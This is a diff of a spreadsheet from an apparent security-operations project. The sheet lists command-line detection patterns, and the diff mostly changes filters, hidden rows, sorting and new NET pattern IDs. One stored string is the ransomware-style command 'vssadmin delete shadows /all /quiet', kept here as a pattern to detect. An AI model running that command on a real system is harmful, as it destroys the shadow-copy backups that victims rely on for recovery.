--- a/docs/TIP-CommandLine.xlsx
+++ b/docs/TIP-CommandLine.xlsx
@@ -5,12 +5,12 @@
   <workbookPr defaultThemeVersion="166925"/>
   <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
     <mc:Choice Requires="x15">
-      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/"/>
+      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/GithubProjects/SOC-Puppet/docs/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{C9180D72-9412-6149-9930-217C0A96CE9E}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{31161A4F-9B86-2A42-AA0E-67090EBC7275}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
-    <workbookView xWindow="0" yWindow="-21100" windowWidth="38400" windowHeight="21100" xr2:uid="{A9D12C86-CCAB-E94D-B7F0-B816A83AE7B1}"/>
+    <workbookView xWindow="0" yWindow="760" windowWidth="34560" windowHeight="21580" xr2:uid="{A9D12C86-CCAB-E94D-B7F0-B816A83AE7B1}"/>
   </bookViews>
   <sheets>
     <sheet name="Sheet1" sheetId="1" r:id="rId1"/>
@@ -36,7 +36,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1063" uniqueCount="390">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1063" uniqueCount="396">
   <si>
     <t>Pattern</t>
   </si>
@@ -1301,6 +1301,27 @@
   </si>
   <si>
     <t>\"C:\\Windows\\System32\\cmd.exe\" /c vssadmin delete shadows /all /quiet &amp;amp</t>
+  </si>
+  <si>
+    <t>NET_P001</t>
+  </si>
+  <si>
+    <t>NET_P003</t>
+  </si>
+  <si>
+    <t>NET_P002</t>
+  </si>
+  <si>
+    <t>NET_P002
+NET_P003</t>
+  </si>
+  <si>
+    <t>NET_P005</t>
+  </si>
+  <si>
+    <t>NET_P103
+NET_P100
+NET_P102</t>
   </si>
 </sst>
 </file>
@@ -1379,7 +1400,16 @@
 
 <file path=xl/tables/table1.xml><?xml version="1.0" encoding="utf-8"?>
 <table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="1" xr:uid="{485C79FA-D6D5-EA48-96EB-664E304004D9}" name="Table1" displayName="Table1" ref="A1:F240" totalsRowShown="0">
-  <autoFilter ref="A1:F240" xr:uid="{485C79FA-D6D5-EA48-96EB-664E304004D9}"/>
+  <autoFilter ref="A1:F240" xr:uid="{485C79FA-D6D5-EA48-96EB-664E304004D9}">
+    <filterColumn colId="0">
+      <filters>
+        <filter val="NET"/>
+      </filters>
+    </filterColumn>
+  </autoFilter>
+  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A21:F236">
+    <sortCondition ref="B1:B240"/>
+  </sortState>
   <tableColumns count="6">
     <tableColumn id="1" xr3:uid="{CC8E4D7C-9AD6-AF4E-AAE8-17CAF7B0ED19}" name="PID"/>
     <tableColumn id="2" xr3:uid="{3EBD7E65-ACCA-BA4D-95AC-3ADC35252112}" name="Pattern" dataDxfId="1"/>
@@ -1691,13 +1721,13 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{777F7044-177D-E446-92F0-ACF0229F6F68}">
   <dimension ref="A1:F240"/>
   <sheetViews>
-    <sheetView tabSelected="1" topLeftCell="A212" workbookViewId="0">
-      <selection activeCell="C243" sqref="C243:C244"/>
+    <sheetView tabSelected="1" workbookViewId="0">
+      <selection activeCell="B122" sqref="B122"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16"/>
   <cols>
-    <col min="1" max="1" width="20.83203125" customWidth="1"/>
+    <col min="1" max="1" width="12.6640625" bestFit="1" customWidth="1"/>
     <col min="2" max="3" width="100.83203125" customWidth="1"/>
     <col min="4" max="5" width="18.1640625" customWidth="1"/>
     <col min="6" max="6" width="116.33203125" bestFit="1" customWidth="1"/>
@@ -1724,7 +1754,7 @@
         <v>5</v>
       </c>
     </row>
-    <row r="2" spans="1:6" ht="17">
+    <row r="2" spans="1:6" ht="17" hidden="1">
       <c r="A2" t="s">
         <v>11</v>
       </c>
@@ -1741,7 +1771,7 @@
         <v>7</v>
       </c>
     </row>
-    <row r="3" spans="1:6" ht="17">
+    <row r="3" spans="1:6" ht="17" hidden="1">
       <c r="A3" t="s">
         <v>12</v>
       </c>
@@ -1758,7 +1788,7 @@
         <v>7</v>
       </c>
     </row>
-    <row r="4" spans="1:6" ht="17">
+    <row r="4" spans="1:6" ht="17" hidden="1">
       <c r="A4" t="s">
         <v>12</v>
       </c>
@@ -1775,7 +1805,7 @@
         <v>7</v>
       </c>
     </row>
-    <row r="5" spans="1:6" ht="17">
+    <row r="5" spans="1:6" ht="17" hidden="1">
       <c r="A5" t="s">
         <v>29</v>
       </c>
@@ -1792,7 +1822,7 @@
         <v>7</v>
       </c>
     </row>
-    <row r="6" spans="1:6" ht="17">
+    <row r="6" spans="1:6" ht="17" hidden="1">
       <c r="A6" t="s">
         <v>24</v>
       </c>
@@ -1809,7 +1839,7 @@
         <v>7</v>
       </c>
     </row>
-    <row r="7" spans="1:6" ht="17">
+    <row r="7" spans="1:6" ht="17" hidden="1">
       <c r="A7" t="s">
         <v>11</v>
       </c>
@@ -1826,7 +1856,7 @@
         <v>7</v>
       </c>
     </row>
-    <row r="8" spans="1:6" ht="17">
+    <row r="8" spans="1:6" ht="17" hidden="1">
       <c r="A8" t="s">
         <v>17</v>
       </c>
@@ -1843,7 +1873,7 @@
         <v>7</v>
       </c>
     </row>
-    <row r="9" spans="1:6" ht="17">
+    <row r="9" spans="1:6" ht="17" hidden="1">
       <c r="A9" t="s">
         <v>17</v>
       </c>
@@ -1860,7 +1890,7 @@
         <v>7</v>
       </c>
     </row>
-    <row r="10" spans="1:6" ht="17">
+    <row r="10" spans="1:6" ht="17" hidden="1">
       <c r="A10" t="s">
         <v>40</v>
       </c>
@@ -1877,7 +1907,7 @@
         <v>7</v>
       </c>
     </row>
-    <row r="11" spans="1:6" ht="34">
+    <row r="11" spans="1:6" ht="34" hidden="1">
       <c r="A11" t="s">
         <v>21</v>
       </c>
@@ -1894,7 +1924,7 @@
         <v>7</v>
       </c>
     </row>
-    <row r="12" spans="1:6" ht="17">
+    <row r="12" spans="1:6" ht="17" hidden="1">
       <c r="A12" t="s">
         <v>23</v>
       </c>
@@ -1909,7 +1939,7 @@
         <v>7</v>
       </c>
     </row>
-    <row r="13" spans="1:6" ht="17">
+    <row r="13" spans="1:6" ht="17" hidden="1">
       <c r="A13" t="s">
         <v>29</v>
       </c>
@@ -1926,7 +1956,7 @@
         <v>28</v>
       </c>
     </row>
-    <row r="14" spans="1:6" ht="17">
+    <row r="14" spans="1:6" ht="17" hidden="1">
       <c r="A14" t="s">
         <v>24</v>
       </c>
@@ -1943,7 +1973,7 @@
         <v>28</v>
       </c>
     </row>
-    <row r="15" spans="1:6" ht="17">
+    <row r="15" spans="1:6" ht="17" hidden="1">
       <c r="A15" t="s">
         <v>11</v>
       </c>
@@ -1960,7 +1990,7 @@
         <v>28</v>
       </c>
     </row>
-    <row r="16" spans="1:6" ht="17">
+    <row r="16" spans="1:6" ht="17" hidden="1">
       <c r="A16" t="s">
         <v>11</v>
       </c>
@@ -1977,7 +2007,7 @@
         <v>28</v>
       </c>
     </row>
-    <row r="17" spans="1:6" ht="34">
+    <row r="17" spans="1:6" ht="34" hidden="1">
       <c r="A17" t="s">
         <v>21</v>
       </c>
@@ -1994,7 +2024,7 @@
         <v>28</v>
       </c>
     </row>
-    <row r="18" spans="1:6" ht="17">
+    <row r="18" spans="1:6" ht="17" hidden="1">
       <c r="A18" t="s">
         <v>40</v>
       </c>
@@ -2011,7 +2041,7 @@
         <v>28</v>
       </c>
     </row>
-    <row r="19" spans="1:6" ht="34">
+    <row r="19" spans="1:6" ht="34" hidden="1">
       <c r="A19" t="s">
         <v>12</v>
       </c>
@@ -2028,7 +2058,7 @@
         <v>28</v>
       </c>
     </row>
-    <row r="20" spans="1:6" ht="17">
+    <row r="20" spans="1:6" ht="17" hidden="1">
       <c r="A20" t="s">
         <v>12</v>
       </c>
@@ -2045,24 +2075,22 @@
         <v>28</v>
       </c>
     </row>
-    <row r="21" spans="1:6" ht="17">
+    <row r="21" spans="1:6" ht="136">
       <c r="A21" t="s">
         <v>45</v>
       </c>
       <c r="B21" s="1" t="s">
-        <v>44</v>
-      </c>
-      <c r="C21" s="1" t="s">
-        <v>46</v>
-      </c>
+        <v>329</v>
+      </c>
+      <c r="C21" s="1"/>
       <c r="E21" t="s">
-        <v>6</v>
+        <v>312</v>
       </c>
       <c r="F21" t="s">
-        <v>28</v>
-      </c>
-    </row>
-    <row r="22" spans="1:6" ht="17">
+        <v>325</v>
+      </c>
+    </row>
+    <row r="22" spans="1:6" ht="17" hidden="1">
       <c r="A22" t="s">
         <v>17</v>
       </c>
@@ -2079,7 +2107,7 @@
         <v>28</v>
       </c>
     </row>
-    <row r="23" spans="1:6" ht="17">
+    <row r="23" spans="1:6" ht="17" hidden="1">
       <c r="A23" t="s">
         <v>17</v>
       </c>
@@ -2096,7 +2124,7 @@
         <v>28</v>
       </c>
     </row>
-    <row r="24" spans="1:6" ht="17">
+    <row r="24" spans="1:6" ht="17" hidden="1">
       <c r="A24" t="s">
         <v>24</v>
       </c>
@@ -2113,7 +2141,7 @@
         <v>28</v>
       </c>
     </row>
-    <row r="25" spans="1:6" ht="17">
+    <row r="25" spans="1:6" ht="17" hidden="1">
       <c r="A25" t="s">
         <v>24</v>
       </c>
@@ -2130,7 +2158,7 @@
         <v>28</v>
       </c>
     </row>
-    <row r="26" spans="1:6" ht="34">
+    <row r="26" spans="1:6" ht="34" hidden="1">
       <c r="A26" t="s">
         <v>40</v>
       </c>
@@ -2147,7 +2175,7 @@
         <v>28</v>
       </c>
     </row>
-    <row r="27" spans="1:6" ht="17">
+    <row r="27" spans="1:6" ht="17" hidden="1">
       <c r="A27" t="s">
         <v>57</v>
       </c>
@@ -2164,7 +2192,7 @@
         <v>28</v>
       </c>
     </row>
-    <row r="28" spans="1:6" ht="17">
+    <row r="28" spans="1:6" ht="17" hidden="1">
       <c r="A28" t="s">
         <v>57</v>
       </c>
@@ -2186,16 +2214,16 @@
         <v>45</v>
       </c>
       <c r="B29" s="1" t="s">
-        <v>61</v>
+        <v>146</v>
       </c>
       <c r="C29" s="1" t="s">
-        <v>66</v>
+        <v>147</v>
       </c>
       <c r="E29" t="s">
-        <v>6</v>
+        <v>143</v>
       </c>
       <c r="F29" t="s">
-        <v>28</v>
+        <v>153</v>
       </c>
     </row>
     <row r="30" spans="1:6" ht="17">
@@ -2203,36 +2231,36 @@
         <v>45</v>
       </c>
       <c r="B30" s="1" t="s">
-        <v>62</v>
+        <v>145</v>
       </c>
       <c r="C30" s="1" t="s">
-        <v>66</v>
+        <v>148</v>
       </c>
       <c r="E30" t="s">
-        <v>6</v>
+        <v>143</v>
       </c>
       <c r="F30" t="s">
-        <v>28</v>
+        <v>153</v>
       </c>
     </row>
     <row r="31" spans="1:6" ht="17">
       <c r="A31" t="s">
-        <v>45</v>
+        <v>392</v>
       </c>
       <c r="B31" s="1" t="s">
-        <v>63</v>
+        <v>165</v>
       </c>
       <c r="C31" s="1" t="s">
-        <v>66</v>
+        <v>166</v>
       </c>
       <c r="E31" t="s">
-        <v>6</v>
+        <v>143</v>
       </c>
       <c r="F31" t="s">
-        <v>28</v>
-      </c>
-    </row>
-    <row r="32" spans="1:6" ht="17">
+        <v>153</v>
+      </c>
+    </row>
+    <row r="32" spans="1:6" ht="17" hidden="1">
       <c r="A32" t="s">
         <v>64</v>
       </c>
@@ -2249,7 +2277,7 @@
         <v>28</v>
       </c>
     </row>
-    <row r="33" spans="1:6" ht="17">
+    <row r="33" spans="1:6" ht="17" hidden="1">
       <c r="A33" t="s">
         <v>68</v>
       </c>
@@ -2266,7 +2294,7 @@
         <v>28</v>
       </c>
     </row>
-    <row r="34" spans="1:6" ht="34">
+    <row r="34" spans="1:6" ht="34" hidden="1">
       <c r="A34" t="s">
         <v>74</v>
       </c>
@@ -2283,7 +2311,7 @@
         <v>72</v>
       </c>
     </row>
-    <row r="35" spans="1:6" ht="17">
+    <row r="35" spans="1:6" ht="17" hidden="1">
       <c r="A35" t="s">
         <v>11</v>
       </c>
@@ -2298,7 +2326,7 @@
         <v>72</v>
       </c>
     </row>
-    <row r="36" spans="1:6" ht="17">
+    <row r="36" spans="1:6" ht="17" hidden="1">
       <c r="A36" t="s">
         <v>12</v>
       </c>
@@ -2313,7 +2341,7 @@
         <v>72</v>
       </c>
     </row>
-    <row r="37" spans="1:6" ht="17">
+    <row r="37" spans="1:6" ht="17" hidden="1">
       <c r="A37" t="s">
         <v>12</v>
       </c>
@@ -2328,7 +2356,7 @@
         <v>72</v>
       </c>
     </row>
-    <row r="38" spans="1:6" ht="34">
+    <row r="38" spans="1:6" ht="34" hidden="1">
       <c r="A38" t="s">
         <v>21</v>
       </c>
@@ -2343,7 +2371,7 @@
         <v>72</v>
       </c>
     </row>
-    <row r="39" spans="1:6" ht="17">
+    <row r="39" spans="1:6" ht="17" hidden="1">
       <c r="A39" t="s">
         <v>24</v>
       </c>
@@ -2358,7 +2386,7 @@
         <v>72</v>
       </c>
     </row>
-    <row r="40" spans="1:6" ht="17">
+    <row r="40" spans="1:6" ht="17" hidden="1">
       <c r="A40" t="s">
         <v>23</v>
       </c>
@@ -2373,7 +2401,7 @@
         <v>72</v>
       </c>
     </row>
-    <row r="41" spans="1:6" ht="34">
+    <row r="41" spans="1:6" ht="34" hidden="1">
       <c r="A41" t="s">
         <v>21</v>
       </c>
@@ -2390,7 +2418,7 @@
         <v>72</v>
       </c>
     </row>
-    <row r="42" spans="1:6" ht="17">
+    <row r="42" spans="1:6" ht="17" hidden="1">
       <c r="A42" t="s">
         <v>40</v>
       </c>
@@ -2407,7 +2435,7 @@
         <v>72</v>
       </c>
     </row>
-    <row r="43" spans="1:6" ht="34">
+    <row r="43" spans="1:6" ht="34" hidden="1">
       <c r="A43" t="s">
         <v>84</v>
       </c>
@@ -2424,7 +2452,7 @@
         <v>72</v>
       </c>
     </row>
-    <row r="44" spans="1:6" ht="17">
+    <row r="44" spans="1:6" ht="17" hidden="1">
       <c r="A44" t="s">
         <v>84</v>
       </c>
@@ -2439,7 +2467,7 @@
         <v>72</v>
       </c>
     </row>
-    <row r="45" spans="1:6" ht="34">
+    <row r="45" spans="1:6" ht="34" hidden="1">
       <c r="A45" t="s">
         <v>87</v>
       </c>
@@ -2456,7 +2484,7 @@
         <v>90</v>
       </c>
     </row>
-    <row r="46" spans="1:6" ht="34">
+    <row r="46" spans="1:6" ht="34" hidden="1">
       <c r="A46" t="s">
         <v>21</v>
       </c>
@@ -2471,7 +2499,7 @@
         <v>90</v>
       </c>
     </row>
-    <row r="47" spans="1:6" ht="17">
+    <row r="47" spans="1:6" ht="17" hidden="1">
       <c r="A47" t="s">
         <v>220</v>
       </c>
@@ -2486,7 +2514,7 @@
         <v>90</v>
       </c>
     </row>
-    <row r="48" spans="1:6" ht="34">
+    <row r="48" spans="1:6" ht="34" hidden="1">
       <c r="A48" t="s">
         <v>93</v>
       </c>
@@ -2503,7 +2531,7 @@
         <v>90</v>
       </c>
     </row>
-    <row r="49" spans="1:6" ht="17">
+    <row r="49" spans="1:6" ht="17" hidden="1">
       <c r="A49" t="s">
         <v>220</v>
       </c>
@@ -2518,7 +2546,7 @@
         <v>90</v>
       </c>
     </row>
-    <row r="50" spans="1:6" ht="17">
+    <row r="50" spans="1:6" ht="17" hidden="1">
       <c r="A50" t="s">
         <v>40</v>
       </c>
@@ -2535,7 +2563,7 @@
         <v>90</v>
       </c>
     </row>
-    <row r="51" spans="1:6" ht="17">
+    <row r="51" spans="1:6" ht="17" hidden="1">
       <c r="A51" t="s">
         <v>98</v>
       </c>
@@ -2552,7 +2580,7 @@
         <v>90</v>
       </c>
     </row>
-    <row r="52" spans="1:6" ht="17">
+    <row r="52" spans="1:6" ht="17" hidden="1">
       <c r="A52" t="s">
         <v>101</v>
       </c>
@@ -2567,7 +2595,7 @@
         <v>90</v>
       </c>
     </row>
-    <row r="53" spans="1:6" ht="17">
+    <row r="53" spans="1:6" ht="17" hidden="1">
       <c r="A53" t="s">
         <v>103</v>
       </c>
@@ -2584,7 +2612,7 @@
         <v>90</v>
       </c>
     </row>
-    <row r="54" spans="1:6" ht="68">
+    <row r="54" spans="1:6" ht="68" hidden="1">
       <c r="A54" t="s">
         <v>106</v>
       </c>
@@ -2601,7 +2629,7 @@
         <v>90</v>
       </c>
     </row>
-    <row r="55" spans="1:6" ht="17">
+    <row r="55" spans="1:6" ht="17" hidden="1">
       <c r="A55" t="s">
         <v>109</v>
       </c>
@@ -2616,7 +2644,7 @@
         <v>90</v>
       </c>
     </row>
-    <row r="56" spans="1:6" ht="51">
+    <row r="56" spans="1:6" ht="51" hidden="1">
       <c r="A56" t="s">
         <v>112</v>
       </c>
@@ -2631,7 +2659,7 @@
         <v>90</v>
       </c>
     </row>
-    <row r="57" spans="1:6" ht="17">
+    <row r="57" spans="1:6" ht="17" hidden="1">
       <c r="A57" t="s">
         <v>112</v>
       </c>
@@ -2646,7 +2674,7 @@
         <v>90</v>
       </c>
     </row>
-    <row r="58" spans="1:6" ht="51">
+    <row r="58" spans="1:6" ht="51" hidden="1">
       <c r="A58" t="s">
         <v>114</v>
       </c>
@@ -2661,7 +2689,7 @@
         <v>90</v>
       </c>
     </row>
-    <row r="59" spans="1:6" ht="51">
+    <row r="59" spans="1:6" ht="51" hidden="1">
       <c r="A59" t="s">
         <v>116</v>
       </c>
@@ -2678,7 +2706,7 @@
         <v>90</v>
       </c>
     </row>
-    <row r="60" spans="1:6" ht="34">
+    <row r="60" spans="1:6" ht="34" hidden="1">
       <c r="A60" t="s">
         <v>119</v>
       </c>
@@ -2695,7 +2723,7 @@
         <v>90</v>
       </c>
     </row>
-    <row r="61" spans="1:6" ht="17">
+    <row r="61" spans="1:6" ht="17" hidden="1">
       <c r="A61" t="s">
         <v>40</v>
       </c>
@@ -2712,7 +2740,7 @@
         <v>90</v>
       </c>
     </row>
-    <row r="62" spans="1:6" ht="17">
+    <row r="62" spans="1:6" ht="17" hidden="1">
       <c r="A62" t="s">
         <v>40</v>
       </c>
@@ -2729,7 +2757,7 @@
         <v>90</v>
       </c>
     </row>
-    <row r="63" spans="1:6" ht="17">
+    <row r="63" spans="1:6" ht="17" hidden="1">
       <c r="A63" t="s">
         <v>40</v>
       </c>
@@ -2746,7 +2774,7 @@
         <v>90</v>
       </c>
     </row>
-    <row r="64" spans="1:6" ht="17">
+    <row r="64" spans="1:6" ht="17" hidden="1">
       <c r="A64" t="s">
         <v>40</v>
       </c>
@@ -2763,7 +2791,7 @@
         <v>90</v>
       </c>
     </row>
-    <row r="65" spans="1:6" ht="34">
+    <row r="65" spans="1:6" ht="34" hidden="1">
       <c r="A65" t="s">
         <v>21</v>
       </c>
@@ -2780,7 +2808,7 @@
         <v>90</v>
       </c>
     </row>
-    <row r="66" spans="1:6" ht="17">
+    <row r="66" spans="1:6" ht="17" hidden="1">
       <c r="A66" t="s">
         <v>128</v>
       </c>
@@ -2795,7 +2823,7 @@
         <v>90</v>
       </c>
     </row>
-    <row r="67" spans="1:6" ht="17">
+    <row r="67" spans="1:6" ht="17" hidden="1">
       <c r="A67" t="s">
         <v>130</v>
       </c>
@@ -2810,7 +2838,7 @@
         <v>90</v>
       </c>
     </row>
-    <row r="68" spans="1:6" ht="17">
+    <row r="68" spans="1:6" ht="17" hidden="1">
       <c r="A68" t="s">
         <v>130</v>
       </c>
@@ -2825,7 +2853,7 @@
         <v>90</v>
       </c>
     </row>
-    <row r="69" spans="1:6" ht="17">
+    <row r="69" spans="1:6" ht="17" hidden="1">
       <c r="A69" t="s">
         <v>12</v>
       </c>
@@ -2840,7 +2868,7 @@
         <v>90</v>
       </c>
     </row>
-    <row r="70" spans="1:6" ht="51">
+    <row r="70" spans="1:6" ht="51" hidden="1">
       <c r="A70" t="s">
         <v>21</v>
       </c>
@@ -2855,7 +2883,7 @@
         <v>90</v>
       </c>
     </row>
-    <row r="71" spans="1:6" ht="17">
+    <row r="71" spans="1:6" ht="17" hidden="1">
       <c r="A71" t="s">
         <v>12</v>
       </c>
@@ -2870,7 +2898,7 @@
         <v>90</v>
       </c>
     </row>
-    <row r="72" spans="1:6" ht="17">
+    <row r="72" spans="1:6" ht="17" hidden="1">
       <c r="A72" t="s">
         <v>24</v>
       </c>
@@ -2885,7 +2913,7 @@
         <v>90</v>
       </c>
     </row>
-    <row r="73" spans="1:6" ht="17">
+    <row r="73" spans="1:6" ht="17" hidden="1">
       <c r="A73" t="s">
         <v>11</v>
       </c>
@@ -2900,7 +2928,7 @@
         <v>90</v>
       </c>
     </row>
-    <row r="74" spans="1:6" ht="17">
+    <row r="74" spans="1:6" ht="17" hidden="1">
       <c r="A74" t="s">
         <v>23</v>
       </c>
@@ -2915,7 +2943,7 @@
         <v>90</v>
       </c>
     </row>
-    <row r="75" spans="1:6" ht="17">
+    <row r="75" spans="1:6" ht="17" hidden="1">
       <c r="A75" t="s">
         <v>17</v>
       </c>
@@ -2930,7 +2958,7 @@
         <v>90</v>
       </c>
     </row>
-    <row r="76" spans="1:6" ht="17">
+    <row r="76" spans="1:6" ht="17" hidden="1">
       <c r="A76" t="s">
         <v>40</v>
       </c>
@@ -2945,7 +2973,7 @@
         <v>90</v>
       </c>
     </row>
-    <row r="77" spans="1:6" ht="17">
+    <row r="77" spans="1:6" ht="17" hidden="1">
       <c r="A77" t="s">
         <v>17</v>
       </c>
@@ -2960,7 +2988,7 @@
         <v>90</v>
       </c>
     </row>
-    <row r="78" spans="1:6" ht="51">
+    <row r="78" spans="1:6" ht="51" hidden="1">
       <c r="A78" t="s">
         <v>150</v>
       </c>
@@ -2977,7 +3005,7 @@
         <v>153</v>
       </c>
     </row>
-    <row r="79" spans="1:6" ht="51">
+    <row r="79" spans="1:6" ht="51" hidden="1">
       <c r="A79" t="s">
         <v>103</v>
       </c>
@@ -2996,13 +3024,13 @@
     </row>
     <row r="80" spans="1:6" ht="17">
       <c r="A80" t="s">
-        <v>45</v>
+        <v>394</v>
       </c>
       <c r="B80" s="1" t="s">
-        <v>145</v>
+        <v>167</v>
       </c>
       <c r="C80" s="1" t="s">
-        <v>148</v>
+        <v>168</v>
       </c>
       <c r="E80" t="s">
         <v>143</v>
@@ -3013,22 +3041,22 @@
     </row>
     <row r="81" spans="1:6" ht="17">
       <c r="A81" t="s">
-        <v>45</v>
+        <v>392</v>
       </c>
       <c r="B81" s="1" t="s">
-        <v>146</v>
+        <v>63</v>
       </c>
       <c r="C81" s="1" t="s">
-        <v>147</v>
+        <v>66</v>
       </c>
       <c r="E81" t="s">
-        <v>143</v>
+        <v>6</v>
       </c>
       <c r="F81" t="s">
-        <v>153</v>
-      </c>
-    </row>
-    <row r="82" spans="1:6" ht="34">
+        <v>28</v>
+      </c>
+    </row>
+    <row r="82" spans="1:6" ht="34" hidden="1">
       <c r="A82" t="s">
         <v>154</v>
       </c>
@@ -3045,7 +3073,7 @@
         <v>153</v>
       </c>
     </row>
-    <row r="83" spans="1:6" ht="17">
+    <row r="83" spans="1:6" ht="17" hidden="1">
       <c r="A83" t="s">
         <v>163</v>
       </c>
@@ -3060,7 +3088,7 @@
         <v>153</v>
       </c>
     </row>
-    <row r="84" spans="1:6" ht="34">
+    <row r="84" spans="1:6" ht="34" hidden="1">
       <c r="A84" t="s">
         <v>116</v>
       </c>
@@ -3077,7 +3105,7 @@
         <v>153</v>
       </c>
     </row>
-    <row r="85" spans="1:6" ht="17">
+    <row r="85" spans="1:6" ht="17" hidden="1">
       <c r="A85" t="s">
         <v>130</v>
       </c>
@@ -3094,7 +3122,7 @@
         <v>153</v>
       </c>
     </row>
-    <row r="86" spans="1:6" ht="17">
+    <row r="86" spans="1:6" ht="17" hidden="1">
       <c r="A86" t="s">
         <v>162</v>
       </c>
@@ -3113,13 +3141,13 @@
     </row>
     <row r="87" spans="1:6" ht="17">
       <c r="A87" t="s">
-        <v>45</v>
+        <v>392</v>
       </c>
       <c r="B87" s="1" t="s">
-        <v>61</v>
+        <v>63</v>
       </c>
       <c r="C87" s="1" t="s">
-        <v>164</v>
+        <v>198</v>
       </c>
       <c r="E87" t="s">
         <v>143</v>
@@ -3128,83 +3156,79 @@
         <v>153</v>
       </c>
     </row>
-    <row r="88" spans="1:6" ht="17">
-      <c r="A88" t="s">
-        <v>45</v>
+    <row r="88" spans="1:6" ht="34">
+      <c r="A88" s="1" t="s">
+        <v>393</v>
       </c>
       <c r="B88" s="1" t="s">
-        <v>165</v>
-      </c>
-      <c r="C88" s="1" t="s">
-        <v>166</v>
-      </c>
+        <v>370</v>
+      </c>
+      <c r="C88" s="1"/>
       <c r="E88" t="s">
-        <v>143</v>
+        <v>312</v>
       </c>
       <c r="F88" t="s">
-        <v>153</v>
+        <v>350</v>
       </c>
     </row>
     <row r="89" spans="1:6" ht="17">
       <c r="A89" t="s">
-        <v>45</v>
+        <v>391</v>
       </c>
       <c r="B89" s="1" t="s">
-        <v>167</v>
+        <v>62</v>
       </c>
       <c r="C89" s="1" t="s">
-        <v>168</v>
+        <v>66</v>
       </c>
       <c r="E89" t="s">
-        <v>143</v>
+        <v>6</v>
       </c>
       <c r="F89" t="s">
-        <v>153</v>
-      </c>
-    </row>
-    <row r="90" spans="1:6" ht="17">
-      <c r="A90" t="s">
-        <v>45</v>
+        <v>28</v>
+      </c>
+    </row>
+    <row r="90" spans="1:6" ht="51">
+      <c r="A90" s="1" t="s">
+        <v>393</v>
       </c>
       <c r="B90" s="1" t="s">
-        <v>169</v>
-      </c>
-      <c r="C90" s="1" t="s">
-        <v>172</v>
-      </c>
+        <v>337</v>
+      </c>
+      <c r="C90" s="1"/>
       <c r="E90" t="s">
-        <v>143</v>
+        <v>312</v>
       </c>
       <c r="F90" t="s">
-        <v>153</v>
+        <v>332</v>
       </c>
     </row>
     <row r="91" spans="1:6" ht="17">
       <c r="A91" t="s">
-        <v>45</v>
+        <v>390</v>
       </c>
       <c r="B91" s="1" t="s">
-        <v>170</v>
+        <v>61</v>
       </c>
       <c r="C91" s="1" t="s">
-        <v>171</v>
+        <v>66</v>
       </c>
       <c r="E91" t="s">
-        <v>143</v>
+        <v>6</v>
       </c>
       <c r="F91" t="s">
-        <v>153</v>
+        <v>28</v>
       </c>
     </row>
     <row r="92" spans="1:6" ht="17">
       <c r="A92" t="s">
-        <v>45</v>
+        <v>390</v>
       </c>
       <c r="B92" s="1" t="s">
-        <v>173</v>
+        <v>61</v>
       </c>
       <c r="C92" s="1" t="s">
-        <v>176</v>
+        <v>164</v>
       </c>
       <c r="E92" t="s">
         <v>143</v>
@@ -3213,7 +3237,7 @@
         <v>153</v>
       </c>
     </row>
-    <row r="93" spans="1:6" ht="34">
+    <row r="93" spans="1:6" ht="34" hidden="1">
       <c r="A93" t="s">
         <v>119</v>
       </c>
@@ -3230,7 +3254,7 @@
         <v>153</v>
       </c>
     </row>
-    <row r="94" spans="1:6" ht="34">
+    <row r="94" spans="1:6" ht="34" hidden="1">
       <c r="A94" t="s">
         <v>119</v>
       </c>
@@ -3247,7 +3271,7 @@
         <v>153</v>
       </c>
     </row>
-    <row r="95" spans="1:6" ht="17">
+    <row r="95" spans="1:6" ht="17" hidden="1">
       <c r="A95" t="s">
         <v>64</v>
       </c>
@@ -3264,7 +3288,7 @@
         <v>153</v>
       </c>
     </row>
-    <row r="96" spans="1:6" ht="17">
+    <row r="96" spans="1:6" ht="17" hidden="1">
       <c r="A96" t="s">
         <v>64</v>
       </c>
@@ -3281,7 +3305,7 @@
         <v>153</v>
       </c>
     </row>
-    <row r="97" spans="1:6" ht="34">
+    <row r="97" spans="1:6" ht="34" hidden="1">
       <c r="A97" t="s">
         <v>188</v>
       </c>
@@ -3298,7 +3322,7 @@
         <v>153</v>
       </c>
     </row>
-    <row r="98" spans="1:6" ht="34">
+    <row r="98" spans="1:6" ht="34" hidden="1">
       <c r="A98" t="s">
         <v>187</v>
       </c>
@@ -3315,7 +3339,7 @@
         <v>153</v>
       </c>
     </row>
-    <row r="99" spans="1:6" ht="17">
+    <row r="99" spans="1:6" ht="17" hidden="1">
       <c r="A99" t="s">
         <v>93</v>
       </c>
@@ -3330,7 +3354,7 @@
